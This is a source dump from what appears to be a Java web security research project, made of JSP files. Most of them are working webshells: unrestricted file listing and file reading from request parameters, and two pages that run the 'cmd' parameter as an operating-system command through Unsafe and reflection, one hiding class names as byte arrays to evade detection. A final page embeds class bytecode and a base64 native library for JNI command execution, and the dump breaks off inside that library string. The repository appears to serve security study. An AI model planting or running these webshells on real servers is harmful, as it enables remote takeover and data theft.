9 | <%!
10 | // 定义限制用户遍历的文件目录常量
11 | private static final String IMAGE_DIR = "/Users/yz/IdeaProjects/javaweb-sec/javaweb-sec-source/java-filesystem/src/main/webapp";
12 | %>
13 | <%
14 | // 定义需要遍历的目录
15 | String dirStr = request.getParameter("dir");
16 |
17 | if (dirStr != null) {
18 | File dir = new File(dirStr);
19 |
20 | // 获取文件绝对路径,转换成标准的文件路径
21 | String fileDir = (dir.getAbsoluteFile().getCanonicalFile() + "/").replace("\\\\", "").replaceAll("/+", "/");
22 | out.println("" + fileDir + "
");
23 |
24 | // 检查当前用户传入的目录是否包含在系统限定的目录下
25 | if (fileDir.startsWith(IMAGE_DIR)) {
26 | File[] dirs = dir.listFiles();
27 |
28 | out.println("");
29 |
30 | for (File file : dirs) {
31 | out.println(file.getName());
32 | }
33 |
34 | out.println("");
35 | } else {
36 | out.println("目录不合法!");
37 | }
38 | }
39 |
40 | %>
41 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/file-list.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="java.io.File" %><%--
2 | Created by IntelliJ IDEA.
3 | User: yz
4 | Date: 2019/12/4
5 | Time: 6:08 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 | <%
10 | // 定义需要遍历的目录
11 | String dirStr = request.getParameter("dir");
12 |
13 | out.println("" + dirStr + "
");
14 |
15 | if (dirStr != null) {
16 | File dir = new File(dirStr);
17 | File[] dirs = dir.listFiles();
18 |
19 | out.println("");
20 |
21 | for (File file : dirs) {
22 | out.println(file.getName());
23 | }
24 |
25 | out.println("");
26 | }
27 |
28 | %>
29 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/file-read.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%@ page import="java.io.ByteArrayOutputStream" %>
3 | <%@ page import="java.io.File" %>
4 | <%@ page import="java.io.FileInputStream" %>
5 |
6 | <%
7 | File file = new File(request.getParameter("path"));
8 | FileInputStream fis = new FileInputStream(file);
9 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
10 | byte[] b = new byte[1024];
11 | int a = -1;
12 |
13 | while ((a = fis.read(b)) != -1) {
14 | baos.write(b, 0, a);
15 | }
16 |
17 | out.write("" + new String(baos.toByteArray()) + "
");
18 |
19 | fis.close();
20 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/fork_and_exec.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%@ page import="sun.misc.Unsafe" %>
3 | <%@ page import="java.io.ByteArrayOutputStream" %>
4 | <%@ page import="java.io.InputStream" %>
5 | <%@ page import="java.lang.reflect.Field" %>
6 | <%@ page import="java.lang.reflect.Method" %>
7 | <%!
8 | byte[] toCString(String s) {
9 | if (s == null)
10 | return null;
11 | byte[] bytes = s.getBytes();
12 | byte[] result = new byte[bytes.length + 1];
13 | System.arraycopy(bytes, 0,
14 | result, 0,
15 | bytes.length);
16 | result[result.length - 1] = (byte) 0;
17 | return result;
18 | }
19 |
20 |
21 | %>
22 | <%
23 | String[] strs = request.getParameterValues("cmd");
24 |
25 | if (strs != null) {
26 | Field theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe");
27 | theUnsafeField.setAccessible(true);
28 | Unsafe unsafe = (Unsafe) theUnsafeField.get(null);
29 |
30 | Class processClass = null;
31 |
32 | try {
33 | processClass = Class.forName("java.lang.UNIXProcess");
34 | } catch (ClassNotFoundException e) {
35 | processClass = Class.forName("java.lang.ProcessImpl");
36 | }
37 |
38 | Object processObject = unsafe.allocateInstance(processClass);
39 |
40 | // Convert arguments to a contiguous block; it's easier to do
41 | // memory management in Java than in C.
42 | byte[][] args = new byte[strs.length - 1][];
43 | int size = args.length; // For added NUL bytes
44 |
45 | for (int i = 0; i < args.length; i++) {
46 | args[i] = strs[i + 1].getBytes();
47 | size += args[i].length;
48 | }
49 |
50 | byte[] argBlock = new byte[size];
51 | int i = 0;
52 |
53 | for (byte[] arg : args) {
54 | System.arraycopy(arg, 0, argBlock, i, arg.length);
55 | i += arg.length + 1;
56 | // No need to write NUL bytes explicitly
57 | }
58 |
59 | int[] envc = new int[1];
60 | int[] std_fds = new int[]{-1, -1, -1};
61 | Field launchMechanismField = processClass.getDeclaredField("launchMechanism");
62 | Field helperpathField = processClass.getDeclaredField("helperpath");
63 | launchMechanismField.setAccessible(true);
64 | helperpathField.setAccessible(true);
65 | Object launchMechanismObject = launchMechanismField.get(processObject);
66 | byte[] helperpathObject = (byte[]) helperpathField.get(processObject);
67 |
68 | int ordinal = (int) launchMechanismObject.getClass().getMethod("ordinal").invoke(launchMechanismObject);
69 |
70 | Method forkMethod = processClass.getDeclaredMethod("forkAndExec", new Class[]{
71 | int.class, byte[].class, byte[].class, byte[].class, int.class,
72 | byte[].class, int.class, byte[].class, int[].class, boolean.class
73 | });
74 |
75 | forkMethod.setAccessible(true);// 设置访问权限
76 |
77 | int pid = (int) forkMethod.invoke(processObject, new Object[]{
78 | ordinal + 1, helperpathObject, toCString(strs[0]), argBlock, args.length,
79 | null, envc[0], null, std_fds, false
80 | });
81 |
82 | // 初始化命令执行结果,将本地命令执行的输出流转换为程序执行结果的输出流
83 | Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class);
84 | initStreamsMethod.setAccessible(true);
85 | initStreamsMethod.invoke(processObject, std_fds);
86 |
87 | // 获取本地执行结果的输入流
88 | Method getInputStreamMethod = processClass.getMethod("getInputStream");
89 | getInputStreamMethod.setAccessible(true);
90 | InputStream in = (InputStream) getInputStreamMethod.invoke(processObject);
91 |
92 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
93 | int a = 0;
94 | byte[] b = new byte[1024];
95 |
96 | while ((a = in.read(b)) != -1) {
97 | baos.write(b, 0, a);
98 | }
99 |
100 | out.println("");
101 | out.println(baos.toString());
102 | out.println("");
103 | out.flush();
104 | out.close();
105 | }
106 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/index.jsp:
--------------------------------------------------------------------------------
1 |
2 |
3 | Hello World!
4 |
5 |
6 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/linux-cmd.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%@ page import="java.io.*" %>
3 | <%@ page import="java.lang.reflect.Constructor" %>
4 | <%@ page import="java.lang.reflect.Method" %>
5 |
6 | <%!
7 | byte[] toCString(String s) {
8 | if (s == null) {
9 | return null;
10 | }
11 |
12 | byte[] bytes = s.getBytes();
13 | byte[] result = new byte[bytes.length + 1];
14 | System.arraycopy(bytes, 0, result, 0, bytes.length);
15 | result[result.length - 1] = (byte) 0;
16 | return result;
17 | }
18 |
19 | InputStream start(String[] strs) throws Exception {
20 | // java.lang.UNIXProcess
21 | String unixClass = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 85, 78, 73, 88, 80, 114, 111, 99, 101, 115, 115});
22 |
23 | // java.lang.ProcessImpl
24 | String processClass = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 80, 114, 111, 99, 101, 115, 115, 73, 109, 112, 108});
25 |
26 | Class clazz = null;
27 |
28 | // 反射创建UNIXProcess或者ProcessImpl
29 | try {
30 | clazz = Class.forName(unixClass);
31 | } catch (ClassNotFoundException e) {
32 | clazz = Class.forName(processClass);
33 | }
34 |
35 | // 获取UNIXProcess或者ProcessImpl的构造方法
36 | Constructor constructor = clazz.getDeclaredConstructors()[0];
37 | constructor.setAccessible(true);
38 |
39 | assert strs != null && strs.length > 0;
40 |
41 | // Convert arguments to a contiguous block; it's easier to do
42 | // memory management in Java than in C.
43 | byte[][] args = new byte[strs.length - 1][];
44 |
45 | int size = args.length; // For added NUL bytes
46 | for (int i = 0; i < args.length; i++) {
47 | args[i] = strs[i + 1].getBytes();
48 | size += args[i].length;
49 | }
50 |
51 | byte[] argBlock = new byte[size];
52 | int i = 0;
53 |
54 | for (byte[] arg : args) {
55 | System.arraycopy(arg, 0, argBlock, i, arg.length);
56 | i += arg.length + 1;
57 | // No need to write NUL bytes explicitly
58 | }
59 |
60 | int[] envc = new int[1];
61 | int[] std_fds = new int[]{-1, -1, -1};
62 |
63 | // 创建UNIXProcess或者ProcessImpl实例
64 | Object object = constructor.newInstance(
65 | toCString(strs[0]), argBlock, args.length,
66 | null, envc[0], null, std_fds, false
67 | );
68 |
69 | // 获取命令执行的InputStream
70 | Method inMethod = object.getClass().getDeclaredMethod("getInputStream");
71 | inMethod.setAccessible(true);
72 |
73 | return (InputStream) inMethod.invoke(object);
74 | }
75 |
76 | String inputStreamToString(InputStream in, String charset) throws IOException {
77 | try {
78 | if (charset == null) {
79 | charset = "UTF-8";
80 | }
81 |
82 | ByteArrayOutputStream out = new ByteArrayOutputStream();
83 | int a = 0;
84 | byte[] b = new byte[1024];
85 |
86 | while ((a = in.read(b)) != -1) {
87 | out.write(b, 0, a);
88 | }
89 |
90 | return new String(out.toByteArray());
91 | } catch (IOException e) {
92 | throw e;
93 | } finally {
94 | if (in != null)
95 | in.close();
96 | }
97 | }
98 | %>
99 | <%
100 | String[] str = request.getParameterValues("cmd");
101 |
102 | if (str != null) {
103 | InputStream in = start(str);
104 | String result = inputStreamToString(in, "UTF-8");
105 | out.println("");
106 | out.println(result);
107 | out.println("");
108 | out.flush();
109 | out.close();
110 | }
111 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/load_library.jsp:
--------------------------------------------------------------------------------
1 | <%--
2 | Created by IntelliJ IDEA.
3 | User: yz
4 | Date: 2019/12/6
5 | Time: 4:59 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
9 | <%@ page import="java.io.File" %>
10 | <%@ page import="java.lang.reflect.Method" %>
11 | <%@ page import="sun.misc.BASE64Decoder" %>
12 | <%@ page import="java.io.IOException" %>
13 | <%@ page import="java.io.FileOutputStream" %>
14 | <%!
15 | private static final String COMMAND_CLASS_NAME = "com.anbai.sec.cmd.CommandExecution";
16 |
17 | /**
18 | * JDK1.5编译的com.anbai.sec.cmd.CommandExecution类字节码,
19 | * 只有一个public static native String exec(String cmd);的方法
20 | */
21 | private static final byte[] COMMAND_CLASS_BYTES = new byte[]{
22 | -54, -2, -70, -66, 0, 0, 0, 49, 0, 15, 10, 0, 3, 0, 12, 7, 0, 13, 7, 0, 14, 1,
23 | 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100,
24 | 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108,
25 | 101, 1, 0, 4, 101, 120, 101, 99, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97,
26 | 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108,
27 | 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 83, 111, 117, 114,
28 | 99, 101, 70, 105, 108, 101, 1, 0, 21, 67, 111, 109, 109, 97, 110, 100, 69, 120,
29 | 101, 99, 117, 116, 105, 111, 110, 46, 106, 97, 118, 97, 12, 0, 4, 0, 5, 1, 0, 34,
30 | 99, 111, 109, 47, 97, 110, 98, 97, 105, 47, 115, 101, 99, 47, 99, 109, 100, 47, 67,
31 | 111, 109, 109, 97, 110, 100, 69, 120, 101, 99, 117, 116, 105, 111, 110, 1, 0, 16,
32 | 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 0, 33, 0,
33 | 2, 0, 3, 0, 0, 0, 0, 0, 2, 0, 1, 0, 4, 0, 5, 0, 1, 0, 6, 0, 0, 0, 29, 0, 1, 0, 1,
34 | 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 1, 0, 7, 0, 0, 0, 6, 0, 1, 0, 0, 0, 7, 1,
35 | 9, 0, 8, 0, 9, 0, 0, 0, 1, 0, 10, 0, 0, 0, 2, 0, 11
36 | };
37 |
38 | // JNI文件Base64编码后的值,这里默认提供一份MacOS的JNI库文件用于测试,其他系统请自行编译
39 | private static final String COMMAND_JNI_FILE_BYTES = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABVSInlSIHsMAEAAEiLBTYHAABIiwBIiUX4SIm9YP///0iJtVj///9IiZVQ////SIO9UP///wAPhEYBAABIi71g////SIu1UP///0iNlU/////opAUAAEiJhUD///9Ii71A////SI01aQYAAOjABQAASImFOP///0iDvTj///8AD4T4AAAASI29IP///+ivAQAASIuVOP///0iNvXD///++gAAAAOh1BQAASImFCP///+kAAAAASIuFCP///0iD+AAPhEQAAABIjb0g////SI21cP///+iHAQAASImFAP///+kAAAAA6af///+J0UiJhRj///+JjRT///9Ijb0g////6AEFAADpbgAAAEiLvTj////oFAUAAImF/P7//+kAAAAASIu9YP///0iNhSD///9Iib3w/v//SInH6JIBAABIi73w/v//SInG6KcEAABIiYXo/v//6QAAAABIi4Xo/v//SImFaP///0iNvSD////okwQAAOkVAAAA6UUAAADpAAAAAEjHhWj///8AAAAASIuFaP///0iLDa0FAABIiwlIi1X4SDnRSImF4P7//w+FLQAAAEiLheD+//9IgcQwAQAAXcNIi70Y////6CAE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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA